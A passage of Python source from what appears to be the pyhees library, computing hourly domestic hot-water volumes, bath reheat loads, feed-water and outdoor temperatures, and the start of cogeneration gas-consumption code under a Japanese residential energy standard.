pipe_diameter(str): ヘッダー分岐後の径
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
"""
# 配管における節湯の効果係数
f_sp = watersaving.get_f_sp(pipe_diameter)
# 洗面水栓における節湯の効果係数
f_sw = watersaving.get_f_sw(washbowl_watersaving_C, Theta_wtr_d)
return W_w_d_t * np.repeat(f_sw, 24) * f_sp
def calc_W_dash_b1_d_t(W_b1_d_t, pipe_diameter):
"""1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h) (6d)
Args:
W_b1_d_t(ndarray): 浴槽水栓湯はり時における基準給湯量 (L/h)
pipe_diameter(str): ヘッダー分岐後の径
Returns:
ndarray: 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
"""
# 配管における節湯の効果係数
f_sp = watersaving.get_f_sp(pipe_diameter)
# 浴槽における節湯の効果係数
f_sb = watersaving.get_f_sb()
return W_b1_d_t * f_sp * f_sb
def calc_W_dash_b2_d_t(W_b2_d_t):
"""1時間当たりの浴槽自動湯はり時における節湯補正給湯量 (L/h) (6e)
Args:
W_b2_d_t(ndarray): 浴槽自動湯はり時における基準給湯量 (L/h)
Returns:
ndarray: 1時間当たりの浴槽自動湯はり時における節湯補正給湯量 (L/h)
"""
# 浴槽における節湯の効果係数
f_sb = watersaving.get_f_sb()
return W_b2_d_t * f_sb
def calc_W_dash_ba1_d_t(W_ba1_d_t, pipe_diameter):
"""1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h) (6f)
Args:
W_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における基準給湯量 (L/h)
pipe_diameter(str): ヘッダー分岐後の径
Returns:
ndarray: 1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h)
"""
# 配管における節湯の効果係数
f_sp = watersaving.get_f_sp(pipe_diameter)
return W_ba1_d_t * f_sp
# ============================================================================
# 10. 基準給湯量
# ============================================================================
def calc_W_k_d_t(n_p, schedule_hw):
"""1時間当たりの台所水栓における基準給湯量 (L/h) (7a)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
Returns:
ndarray: 1時間当たりの台所水栓における基準給湯量 (L/h)
"""
if n_p in [1, 2, 3, 4]:
return calc_W_k_p_d_t(n_p, schedule_hw)
elif 1 <= n_p and n_p <= 2:
W_k_1_d_t = calc_W_k_p_d_t(1, schedule_hw)
W_k_2_d_t = calc_W_k_p_d_t(2, schedule_hw)
return W_k_1_d_t * (2 - n_p) / (2 - 1) + W_k_2_d_t * (n_p - 1) / (2 - 1)
elif 2 <= n_p and n_p <= 3:
W_k_2_d_t = calc_W_k_p_d_t(2, schedule_hw)
W_k_3_d_t = calc_W_k_p_d_t(3, schedule_hw)
return W_k_2_d_t * (3 - n_p) / (3 - 2) + W_k_3_d_t * (n_p - 2) / (3 - 2)
elif 3 <= n_p and n_p <= 4:
W_k_3_d_t = calc_W_k_p_d_t(3, schedule_hw)
W_k_4_d_t = calc_W_k_p_d_t(4, schedule_hw)
return W_k_3_d_t * (4 - n_p) / (4 - 3) + W_k_4_d_t * (n_p - 3) / (4 - 3)
else:
raise ValueError(n_p)
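# Note (supplementary, illustrative): for a fractional virtual occupancy the
# schedule is interpolated linearly between the bracketing integer occupancies,
# e.g. n_p = 2.5 yields 0.5 * W_k_2_d_t + 0.5 * W_k_3_d_t. The same scheme is
# used below for the shower, washbasin and bathtub volumes.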
def calc_W_s_d_t(n_p, schedule_hw, has_bath):
"""1時間当たりの浴室シャワー水栓における基準給湯量 (7b)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
Returns:
ndarray: 1時間当たりの浴室シャワー水栓における基準給湯量 (L/h)
"""
if n_p in [1, 2, 3, 4]:
return calc_W_s_p_d_t(n_p, schedule_hw, has_bath)
elif 1 <= n_p and n_p <= 2:
W_s_1_d_t = calc_W_s_p_d_t(1, schedule_hw, has_bath)
W_s_2_d_t = calc_W_s_p_d_t(2, schedule_hw, has_bath)
return W_s_1_d_t * (2 - n_p) / (2 - 1) + W_s_2_d_t * (n_p - 1) / (2 - 1)
elif 2 <= n_p and n_p <= 3:
W_s_2_d_t = calc_W_s_p_d_t(2, schedule_hw, has_bath)
W_s_3_d_t = calc_W_s_p_d_t(3, schedule_hw, has_bath)
return W_s_2_d_t * (3 - n_p) / (3 - 2) + W_s_3_d_t * (n_p - 2) / (3 - 2)
elif 3 <= n_p and n_p <= 4:
W_s_3_d_t = calc_W_s_p_d_t(3, schedule_hw, has_bath)
W_s_4_d_t = calc_W_s_p_d_t(4, schedule_hw, has_bath)
return W_s_3_d_t * (4 - n_p) / (4 - 3) + W_s_4_d_t * (n_p - 3) / (4 - 3)
else:
raise ValueError(n_p)
def calc_W_w_d_t(n_p, schedule_hw):
"""1時間当たりの洗面水栓における基準給湯量 (7c)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
Returns:
ndarray: 1時間当たりの洗面水栓における基準給湯量 (L/h)
"""
if n_p in [1, 2, 3, 4]:
return calc_W_w_p_d_t(n_p, schedule_hw)
elif 1 <= n_p and n_p <= 2:
W_w_1_d_t = calc_W_w_p_d_t(1, schedule_hw)
W_w_2_d_t = calc_W_w_p_d_t(2, schedule_hw)
return W_w_1_d_t * (2 - n_p) / (2 - 1) + W_w_2_d_t * (n_p - 1) / (2 - 1)
elif 2 <= n_p and n_p <= 3:
W_w_2_d_t = calc_W_w_p_d_t(2, schedule_hw)
W_w_3_d_t = calc_W_w_p_d_t(3, schedule_hw)
return W_w_2_d_t * (3 - n_p) / (3 - 2) + W_w_3_d_t * (n_p - 2) / (3 - 2)
elif 3 <= n_p and n_p <= 4:
W_w_3_d_t = calc_W_w_p_d_t(3, schedule_hw)
W_w_4_d_t = calc_W_w_p_d_t(4, schedule_hw)
return W_w_3_d_t * (4 - n_p) / (4 - 3) + W_w_4_d_t * (n_p - 3) / (4 - 3)
else:
raise ValueError(n_p)
def get_schedule_pattern_list():
"""生活スケジュールパターン
Args:
Returns:
list: 生活スケジュールパターン
"""
ptn_list = [
'休日在宅(大)',
'休日在宅(小)',
'平日(大)',
'平日(中)',
'平日(小)',
'休日外出'
]
return ptn_list
def calc_W_k_p_d_t(p, schedule_hw):
"""1時間当たりの居住人数がp人における台所水栓における基準給湯量
Args:
p(float): 居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
Returns:
ndarray: 1時間当たりの居住人数がp人における台所水栓における基準給湯量 (L/h)
"""
# 読み取るべき表の選択
table = schedule.get_table_m_for_p(p)
# 作業用
W_k_p_d_t = np.zeros(24 * 365)
# 生活スケジュールパターン
ptn_list = get_schedule_pattern_list()
# パターンごとに合算
for i, ptn in enumerate(ptn_list):
f = np.repeat(schedule_hw == ptn, 24)
W_k_p_d_t[f] = np.tile(table[i][:, 0], 365)[f]
return W_k_p_d_t
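# Note (supplementary, illustrative): `schedule_hw` holds one pattern name per
# day (365 entries). `np.repeat(schedule_hw == ptn, 24)` expands that to an
# 8760-hour boolean mask, and `np.tile(table[i][:, 0], 365)` repeats the 24-hour
# profile of pattern i over the year, so each day is filled from the table
# column that matches its pattern.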
def calc_W_s_p_d_t(p, schedule_hw, has_bath):
"""1時間当たりの居住人数がp人における浴室シャワー水栓における基準給湯量
Args:
p(float): 居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
Returns:
ndarray: 1時間当たりの居住人数がp人における浴室シャワー水栓における基準給湯量 (L/h)
"""
# 読み取るべき表の選択
table = schedule.get_table_m_for_p(p)
# 作業用
W_s_p_d_t = np.zeros(24 * 365)
# 生活スケジュールパターン
ptn_list = get_schedule_pattern_list()
# 表6で読み取るべき列インデックス
j = 1 if has_bath else 2
# パターンごとに合算
for i, ptn in enumerate(ptn_list):
f = np.repeat(schedule_hw == ptn, 24)
W_s_p_d_t[f] = np.tile(table[i][:, j], 365)[f]
return W_s_p_d_t
def calc_W_w_p_d_t(p, schedule_hw):
"""1時間あたりの居住人数がp人における洗面水栓における基準給湯量
Args:
p(float): 居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
Returns:
ndarray: 1時間当たりの居住人数がp人における洗面水栓における基準給湯量 (L/h)
"""
# 読み取るべき表の選択
table = schedule.get_table_m_for_p(p)
# 作業用
W_w_p_d_t = np.zeros(24 * 365)
# 生活スケジュールパターン
ptn_list = get_schedule_pattern_list()
# パターンごとに合算
for i, ptn in enumerate(ptn_list):
f = np.repeat(schedule_hw == ptn, 24)
W_w_p_d_t[f] = np.tile(table[i][:, 3], 365)[f]
return W_w_p_d_t
def calc_W_b1_d_t(n_p, schedule_hw, has_bath, bath_function):
"""浴槽水栓湯はり時における給湯基準量 (L/h)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
bath_function(str): ふろ機能の種類
Returns:
ndarray: 浴槽水栓湯はり時における給湯基準量 (L/h)
"""
if bath_function == '給湯単機能':
return calc_W_b_d_t(n_p, schedule_hw, has_bath)
elif bath_function == 'ふろ給湯機(追焚なし)' or bath_function == 'ふろ給湯機(追焚あり)':
return np.zeros(24 * 365)
else:
raise ValueError(bath_function)
def calc_W_b2_d_t(n_p, schedule_hw, has_bath, bath_function):
"""浴槽自動湯はり時における給湯基準量 (L/h)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
bath_function(str): ふろ機能の種類
Returns:
ndarray: 浴槽自動湯はり時における給湯基準量 (L/h)
"""
if bath_function == 'ふろ給湯機(追焚なし)' or bath_function == 'ふろ給湯機(追焚あり)':
return calc_W_b_d_t(n_p, schedule_hw, has_bath)
elif bath_function == '給湯単機能':
return np.zeros(24 * 365)
else:
raise ValueError(bath_function)
def calc_W_b_d_t(n_p, schedule_hw, has_bath):
"""1時間当たりの浴槽湯はり時における基準給湯量 (L/h) (8)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
Returns:
ndarray: 1時間あたりの浴槽湯はり時における基準給湯量 (L/h)
"""
if n_p in [1, 2, 3, 4]:
return calc_W_b_p_d_t(n_p, schedule_hw, has_bath)
if 1 <= n_p and n_p <= 2:
W_b_1_d_t = calc_W_b_p_d_t(1, schedule_hw, has_bath)
W_b_2_d_t = calc_W_b_p_d_t(2, schedule_hw, has_bath)
return W_b_1_d_t * (2 - n_p) / (2 - 1) + W_b_2_d_t * (n_p - 1) / (2 - 1)
elif 2 <= n_p and n_p <= 3:
W_b_2_d_t = calc_W_b_p_d_t(2, schedule_hw, has_bath)
W_b_3_d_t = calc_W_b_p_d_t(3, schedule_hw, has_bath)
return W_b_2_d_t * (3 - n_p) / (3 - 2) + W_b_3_d_t * (n_p - 2) / (3 - 2)
elif 3 <= n_p and n_p <= 4:
W_b_3_d_t = calc_W_b_p_d_t(3, schedule_hw, has_bath)
W_b_4_d_t = calc_W_b_p_d_t(4, schedule_hw, has_bath)
return W_b_3_d_t * (4 - n_p) / (4 - 3) + W_b_4_d_t * (n_p - 3) / (4 - 3)
else:
raise ValueError(n_p)
def calc_W_b_p_d_t(p, schedule_hw, has_bath):
"""1時間あたりの居住人数がp人における浴槽湯はり時における基準給湯量
Args:
p(float): 居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
Returns:
ndarray: 1時間あたりの居住人数がp人における浴槽湯はり時における基準給湯量 (L/h)
"""
# 読み取るべき表の選択
table = schedule.get_table_m_for_p(p)
# 作業用
W_b_p_d_t = np.zeros(24 * 365)
# 生活スケジュールパターン
ptn_list = get_schedule_pattern_list()
# 読み取るべき表の列インデックス
j = 4 if has_bath else 5
# パターンごとに合算
for i, ptn in enumerate(ptn_list):
f = np.repeat(schedule_hw == ptn, 24)
W_b_p_d_t[f] = np.tile(table[i][:, j], 365)[f]
return W_b_p_d_t
def calc_n_b_p_d_t(p, schedule_hw, has_bath):
"""1時間あたりの居住人数がp人における入浴人数(人/h)
Args:
p(float): 居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
Returns:
ndarray: 1時間あたりの居住人数がp人における入浴人数(人/h)
"""
# 読み取るべき表の選択
table = schedule.get_table_m_for_p(p)
# 作業用
n_b_p_d_t = np.zeros(24 * 365)
# 生活スケジュールパターン
ptn_list = get_schedule_pattern_list()
# 読み取るべき表の列インデックス
j = 6 if has_bath else 7
# パターンごとに合算
for i, ptn in enumerate(ptn_list):
f = np.repeat(schedule_hw == ptn, 24)
n_b_p_d_t[f] = np.tile(table[i][:, j], 365)[f]
return n_b_p_d_t
def calc_W_ba1_d_t(bath_function, L_ba_d_t, Theta_wtr_d):
"""浴槽水栓さし湯時における基準給湯量 (L/h) (9)
Args:
bath_function(str): ふろ機能の種類
L_ba_d_t(ndarray): 1時間当たりの浴槽沸かし直しによる給湯熱負荷 (MJ/h)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 浴槽水栓さし湯時における基準給湯量 (L/h)
"""
if bath_function == '給湯単機能' or bath_function == 'ふろ給湯機(追焚なし)':
# 浴槽水栓さし湯時における基準給湯温度
Theta_sw_ba1 = get_Theta_sw_ba1()
return L_ba_d_t * (1.0 / (Theta_sw_ba1 - np.repeat(Theta_wtr_d, 24))) * (1.0 / 4.186) * 10 ** 3
elif bath_function == 'ふろ給湯機(追焚あり)':
return np.zeros(24 * 365)
else:
raise ValueError(bath_function)
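# Note (supplementary, illustrative): equation (9) is the inverse of the load
# equations (5a)-(5c): a reheat load in MJ is converted back to litres via
# W = L / ((Theta_sw - Theta_wtr) * 4.186) * 10**3. For example, 2.093 MJ with a
# 50 K lift (60 degC supply, 10 degC feed water) corresponds to about 10 L.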
# ============================================================================
# 11. 浴槽沸かし直しによる給湯熱負荷
# ============================================================================
def calc_L_ba_d_t(bath_insulation, schedule_hw, has_bath, theta_ex_d_Ave_d, n_p):
"""浴槽沸かし直しによる給湯熱負荷 (MJ/h) (10)
Args:
bath_insulation(bool): 浴槽の断熱の有無
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
n_p(float): 仮想居住人数
Returns:
ndarray: 浴槽沸かし直しによる給湯熱負荷 (MJ/h)
"""
if 1 <= n_p and n_p <= 2:
n_b_1_d_t = calc_n_b_p_d_t(1, schedule_hw, has_bath)
n_b_2_d_t = calc_n_b_p_d_t(2, schedule_hw, has_bath)
L_ba_1_d_t = calc_L_ba_p_d_t(1, bath_insulation, n_b_1_d_t, theta_ex_d_Ave_d)
L_ba_2_d_t = calc_L_ba_p_d_t(2, bath_insulation, n_b_2_d_t, theta_ex_d_Ave_d)
return L_ba_1_d_t * (2 - n_p) / (2 - 1) + L_ba_2_d_t * (n_p - 1) / (2 - 1)
elif 2 <= n_p and n_p <= 3:
n_b_2_d_t = calc_n_b_p_d_t(2, schedule_hw, has_bath)
n_b_3_d_t = calc_n_b_p_d_t(3, schedule_hw, has_bath)
L_ba_2_d_t = calc_L_ba_p_d_t(2, bath_insulation, n_b_2_d_t, theta_ex_d_Ave_d)
L_ba_3_d_t = calc_L_ba_p_d_t(3, bath_insulation, n_b_3_d_t, theta_ex_d_Ave_d)
return L_ba_2_d_t * (3 - n_p) / (3 - 2) + L_ba_3_d_t * (n_p - 2) / (3 - 2)
elif 3 <= n_p and n_p <= 4:
n_b_3_d_t = calc_n_b_p_d_t(3, schedule_hw, has_bath)
n_b_4_d_t = calc_n_b_p_d_t(4, schedule_hw, has_bath)
L_ba_3_d_t = calc_L_ba_p_d_t(3, bath_insulation, n_b_3_d_t, theta_ex_d_Ave_d)
L_ba_4_d_t = calc_L_ba_p_d_t(4, bath_insulation, n_b_4_d_t, theta_ex_d_Ave_d)
return L_ba_3_d_t * (4 - n_p) / (4 - 3) + L_ba_4_d_t * (n_p - 3) / (4 - 3)
else:
raise ValueError(n_p)
def calc_L_ba_p_d_t(p, bath_insulation, n_b_p_d_t, theta_ex_d_Ave_d):
"""居住人数がp人における浴槽沸かし直しにおける給湯熱負荷 (11)
Args:
p(float): 居住人数 (人)
bath_insulation(bool): 浴槽の断熱の有無
n_b_p_d_t(ndarray): 居住人数p人における入浴人数(人/h)
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
Returns:
ndarray: 居住人数がp人における浴槽沸かし直しにおける給湯熱負荷 (MJ/h)
"""
# 係数a_ba, b_ba
a_ba_p_d, b_ba_p_d = get_coeff_eq11(bath_insulation, p, theta_ex_d_Ave_d)
# 24時間化
a_ba_p_d = np.repeat(a_ba_p_d, 24)
b_ba_p_d = np.repeat(b_ba_p_d, 24)
theta_ex_d_Ave_d = np.repeat(theta_ex_d_Ave_d, 24)
# 浴槽沸かし直しによる給湯熱負荷 (MJ/h) (11)
# L_ba_p_d_t の作業領域確保
L_ba_p_d_t = np.zeros(24 * 365)
# 1日あたりののべ入浴人数
n_b_p_d = np.repeat(np.sum(n_b_p_d_t.reshape(365, 24), axis=1), 24)
# n_b_p_d > 0 の場合
f1 = (n_b_p_d > 0)
L_ba_p_d_t[f1] = (a_ba_p_d[f1] * theta_ex_d_Ave_d[f1] + b_ba_p_d[f1]) * (n_b_p_d_t[f1] / n_b_p_d[f1])
# n_b_p_d = 0 の場合
f2 = (n_b_p_d == 0)
L_ba_p_d_t[f2] = 0
return L_ba_p_d_t
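# Note (supplementary, illustrative): the daily reheat demand
# a_ba * theta_ex + b_ba (MJ/d) is spread over the hours of the day in
# proportion to the hourly bather count, n_b_p_d_t / n_b_p_d, so hours
# without bathing receive no reheat load.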
def get_coeff_eq11(bath_insulation, p, theta_ex_d_Ave_d):
"""係数a_ba, b_ba
Args:
bath_insulation(bool): 浴槽の断熱の有無
p(float): 居住人数 (人)
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
Returns:
tuple: 係数a_ba, b_ba
"""
if bath_insulation == False:
# 通常浴槽
y_off = 0
elif bath_insulation == True:
# 高断熱浴槽
y_off = 1
else:
raise ValueError(bath_insulation)
x_off = (4 - p) * 2
# 7度未満
tmp_a = ([get_table_6()[y_off][x_off + 0]] * 365) * (theta_ex_d_Ave_d < 7.0)
tmp_b = ([get_table_6()[y_off][x_off + 1]] * 365) * (theta_ex_d_Ave_d < 7.0)
# 7度以上かつ16度未満
tmp_a = tmp_a + ([get_table_6()[y_off + 2][x_off + 0]] * 365) * (7.0 <= theta_ex_d_Ave_d) * (theta_ex_d_Ave_d < 16.0)
tmp_b = tmp_b + ([get_table_6()[y_off + 2][x_off + 1]] * 365) * (7.0 <= theta_ex_d_Ave_d) * (theta_ex_d_Ave_d < 16.0)
# 16度以上かつ25度未満
tmp_a = tmp_a + ([get_table_6()[y_off + 4][x_off + 0]] * 365) * (16.0 <= theta_ex_d_Ave_d) * (theta_ex_d_Ave_d < 25.0)
tmp_b = tmp_b + ([get_table_6()[y_off + 4][x_off + 1]] * 365) * (16.0 <= theta_ex_d_Ave_d) * (theta_ex_d_Ave_d < 25.0)
# 25度以上
tmp_a = tmp_a + ([get_table_6()[y_off + 6][x_off + 0]] * 365) * (25.0 <= theta_ex_d_Ave_d)
tmp_b = tmp_b + ([get_table_6()[y_off + 6][x_off + 1]] * 365) * (25.0 <= theta_ex_d_Ave_d)
return tmp_a, tmp_b
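# Note (supplementary, illustrative): the coefficients are picked from table 6
# by multiplying per-band constants with boolean masks of the daily mean outdoor
# temperature (<7, 7-16, 16-25, >=25 degC). `y_off` switches between the normal
# and insulated bathtub rows, and `x_off = (4 - p) * 2` selects the column pair
# for p occupants, so the result is a 365-day array of (a_ba, b_ba) values.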
def get_table_6():
"""表6 係数 a_ba, b_ba
Args:
Returns:
list: 係数 a_ba, b_ba
"""
table_6 = [
(-0.12, 6.00, -0.10, 4.91, -0.06, 3.02, 0.00, 0.00),
(-0.07, 3.98, -0.06, 3.22, -0.04, 2.01, 0.00, 0.00),
(-0.13, 6.04, -0.10, 4.93, -0.06, 3.04, 0.00, 0.00),
(-0.08, 4.02, -0.06, 3.25, -0.04, 2.03, 0.00, 0.00),
(-0.14, 6.21, -0.11, 5.07, -0.07, 3.13, 0.00, 0.00),
(-0.09, 4.19, -0.07, 3.39, -0.04, 2.12, 0.00, 0.00),
(-0.12, 5.81, -0.10, 4.77, -0.06, 2.92, 0.00, 0.00),
(-0.07, 3.80, -0.06, 3.09, -0.04, 1.92, 0.00, 0.00)
]
return table_6
# ============================================================================
# 12. 日平均給水温度
# ============================================================================
def get_Theta_wtr_d(region, Theta_ex_prd_Ave_d):
"""日平均給水温度 (℃) (12)
Args:
region(int): 省エネルギー地域区分
Theta_ex_prd_Ave_d(ndarray): 期間平均外気温度 (℃)
Returns:
ndarray: 日平均給水温度 (℃)
"""
# 日平均給水温度を求める際の回帰係数
a_wtr, b_wtr = get_table_7()[region - 1]
# 日平均給水温度 (12)
Theta_wtr_d = np.clip(a_wtr * Theta_ex_prd_Ave_d + b_wtr, 0.5, None)
return Theta_wtr_d
def get_table_7():
"""表 7 日平均給水温度を求める際の回帰係数の値
Args:
Returns:
list: 日平均給水温度を求める際の回帰係数の値
"""
table_7 = [
(0.6639, 3.466),
(0.6639, 3.466),
(0.6054, 4.515),
(0.6054, 4.515),
(0.8660, 1.665),
(0.8516, 2.473),
(0.9223, 2.097),
(0.6921, 7.167)
]
return table_7
def get_Theta_ex_prd_Ave_d(theta_ex_d_Ave_d):
"""期間平均外気温度 (℃) (13)
Args:
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
Returns:
ndarray: 期間平均外気温度 (℃)
"""
# 10日前までを拡張した配列を作る(最終日は削る=>-1)
tmp = np.zeros(365 + 10 - 1)
tmp[0:10] = theta_ex_d_Ave_d[-10:]
tmp[10:] = theta_ex_d_Ave_d[0:364]
# 畳み込み演算
# 10日分のデータにそれぞれ0.1を掛けて加算する→平均が求まる
Theta_ex_prd_Ave_d = np.convolve(tmp, [0.1] * 10, mode='valid')
return Theta_ex_prd_Ave_d
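# Note (supplementary, illustrative): the convolution with ten weights of 0.1 is
# a trailing 10-day moving average of the daily mean outdoor temperature
# (wrapping around the year boundary via the 10-day prefix above), e.g.
#   >>> np.convolve(np.arange(10.0), [0.1] * 10, mode='valid')
#   array([4.5])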
# ============================================================================
# 13. 日平均外気温度
# ============================================================================
def get_theta_ex_d_Ave_d(Theta_ex_d_t):
"""日平均外気温度 (℃) (14)
Args:
Theta_ex_d_t(ndarray): 外気温度 (℃)
Returns:
ndarray: 日平均外気温度 (℃)
"""
# 8760時間の一次配列を365*24の二次配列へ再配置させる
tmp = Theta_ex_d_t.reshape(365, 24)
# 二次元目を加算することで二次元目を消滅させる
tmp = np.sum(tmp, axis=1)
# 24で割ることで平均化する
theta_ex_d_Ave_d = tmp / 24
return theta_ex_d_Ave_d
# ============================================================================
# 14. 夜間平均外気温度
# ============================================================================
def get_Theta_ex_Nave_d(Theta_ex_d_t):
"""夜間平均外気温度 (℃) (15)
Args:
Theta_ex_d_t(ndarray): 外気温度 (℃)
Returns:
ndarray: 夜間平均外気温度 (℃)
"""
# 1時間後ろに配列をずらす(そして、12月31日23時を1月1日0時に移動させる)
tmp = np.roll(Theta_ex_d_t, 1)
# ** 1時間ずらしたので、前日23時から当日7時までの代わりに、当日0時から8時までの平均を計算すればよい **
# 8760時間の一次配列を365*24の二次配列へ再配置させる
tmp = tmp.reshape(365, 24)
# 8時~23時を0にする
tmp[:, 8:] = 0
# 配列の2次元目を合算して2次元目を消す
tmp = np.sum(tmp, axis=1)
# 8で割ることで平均化する
Theta_ex_Nave_d = tmp / 8
return Theta_ex_Nave_d
# ============================================================================
# 15. 温水暖房の熱負荷
# ============================================================================
def get_L_HWH_d(L_HWH_d_t):
"""1日当たりの温水温度の熱負荷 (MJ/d) (16)
Args:
L_HWH_d_t(ndarray): 1時間当たりの温水暖房の熱負荷 (MJ/d)
Returns:
ndarray: 1日当たりの温水暖房の熱負荷 (MJ/d)
"""
# 8760時間の一次配列を365*24の二次配列へ再配置させる
tmp = L_HWH_d_t.reshape(365, 24)
# 二次元目を加算することで二次元目を消滅させる
L_HWH_d = np.sum(tmp, axis=1)
return L_HWH_d
```
#### File: src/pyhees/section8.py
```python
import numpy as np
import pyhees.section4_7 as hwh
import pyhees.section7_1 as dhw
import pyhees.section8_a as spec
import pyhees.section8_d as bb_dhw
import pyhees.section8_e as bb_hwh
from pyhees.section11_1 import load_outdoor, get_Theta_ex
# ============================================================================
# 5. ガス消費量
# ============================================================================
def calc_E_G_CG_d_t(bath_function, CG, E_E_dmd_d_t,
L_dashdash_k_d_t, L_dashdash_w_d_t, L_dashdash_s_d_t, L_dashdash_b1_d_t, L_dashdash_b2_d_t,
L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t,
H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad):
"""1時間当たりのコージェネレーション設備のガス消費量 (1)
Args:
bath_function(str): ふろ機能の種類
CG(dict): コージェネレーション設備の仕様
E_E_dmd_d_t(ndarray): 1時間当たりの電力需要 (kWh/h)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
H_HS(dict): 温水暖房用熱源機の仕様
H_MR(dict): 暖房機器の仕様(主たる居室)
H_OR(dict): 暖房機器の仕様(その他の居室)
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード
mode_OR(str): その他の居室の運転モード
L_T_H_rad(ndarray): 放熱器の暖房負荷
Returns:
tuple: 1時間当たりのコージェネレーション設備のガス消費量・発電量のほか、売電に係る控除対象分、発電量のうちの自己消費分、製造熱量のうちの自家消費算入分、タンクユニットの補機消費電力量、給湯時のバックアップボイラーの年間平均効率
"""
# ----- パラメータの取得 -----
if 'CG_category' in CG:
# 温水暖房への排熱利用
exhaust = spec.get_exhaust(CG['CG_category'])
# 排熱利用方式
exhaust_priority = spec.get_exhaust_priority(CG['CG_category'])
# バックアップボイラー(給湯)の給湯機の効率
e_rtd_DHW_BB = spec.get_e_rtd_BB_DHW(CG['CG_category'])
# バックアップボイラー(給湯、温水暖房)の種類
type_BB_HWH = spec.get_type_BB_HWH(CG['CG_category'])
# バックアップボイラー(温水暖房)の定格効率
e_rtd_BB_HWH = spec.get_e_rtd_BB_HWH(CG['CG_category'])
# バックアップボイラー(温水暖房)の定格能力 (W)
q_rtd_BB_HWH = spec.get_q_rtd_BB_HWH(CG['CG_category'])
# 発電ユニットの給湯排熱利用率
r_DHW_gen_PU_d = spec.get_r_DHW_gen_PU_d(CG['CG_category'])
# 発電ユニットの温水暖房排熱利用率
r_HWH_gen_PU_d = spec.get_r_HWH_gen_PU_d(CG['CG_category'])
# 発電ユニットの発電方式
PU_type = spec.get_PU_type(CG['CG_category'])
# 発電ユニットの発電量推定時の仮想発電量のパラメータ a_PU, a_DHW, a_HWH, b, c
param_E_E_gen_PU_Evt_d = spec.get_param_E_E_gen_PU_EVt_d(CG['CG_category'])
# 発電ユニットの排熱量推定時の仮想燃料消費量を求める係数
param_E_F_PU_HVt_d = spec.get_param_E_F_PU_HVt_d(CG['CG_category'])
# 発電ユニットの排熱量推定時の仮想排熱量の上限比を求める係数 a_DHW, a_HWH, b
param_r_H_gen_PU_HVt_d = spec.get_param_r_H_gen_PU_HVt_d(CG['CG_category'])
# 発電ユニットの日平均発電効率を求める係数 a_PU, a_DHW, a_HWH, b, 上限値, 下限値
param_e_E_PU_d = spec.get_param_e_E_PU_d(CG['CG_category'])
# 発電ユニットの日平均排熱効率を求める係数 a_PU, a_DHW, a_HWH, b, 上限値, 下限値
param_e_H_PU_d = spec.get_param_e_H_PU_d(CG['CG_category'])
# 定格発電出力 (W)
P_rtd_PU = spec.get_P_rtd_PU(CG['CG_category'])
# タンクユニットの補機消費電力 (給湯)
P_TU_aux_DHW = spec.get_P_TU_aux_DHW(CG['CG_category'])
# タンクユニットの補機消費電力 (温水暖房)
P_TU_aux_HWH = spec.get_P_TU_aux_HWH(CG['CG_category'])
# 逆潮流の評価
has_CG_reverse = CG['reverse'] if 'reverse' in CG else False
else:
# 温水暖房への排熱利用
exhaust = CG['exhaust']
# 排熱利用方式
exhaust_priority = CG['exhaust_priority']
# バックアップボイラー(給湯、温水暖房)の種類
type_BB_HWH = CG['type_BB_HWH']
# 付録D,Eより
if type_BB_HWH == 'ガス従来型' or type_BB_HWH == 'G_NEJ':
# バックアップボイラー(給湯)の給湯機の効率
e_rtd_DHW_BB = 0.782
# バックアップボイラー(温水暖房)の定格効率
e_rtd_BB_HWH = 0.82
# バックアップボイラー(温水暖房)の定格能力 (W)
q_rtd_BB_HWH = 17400
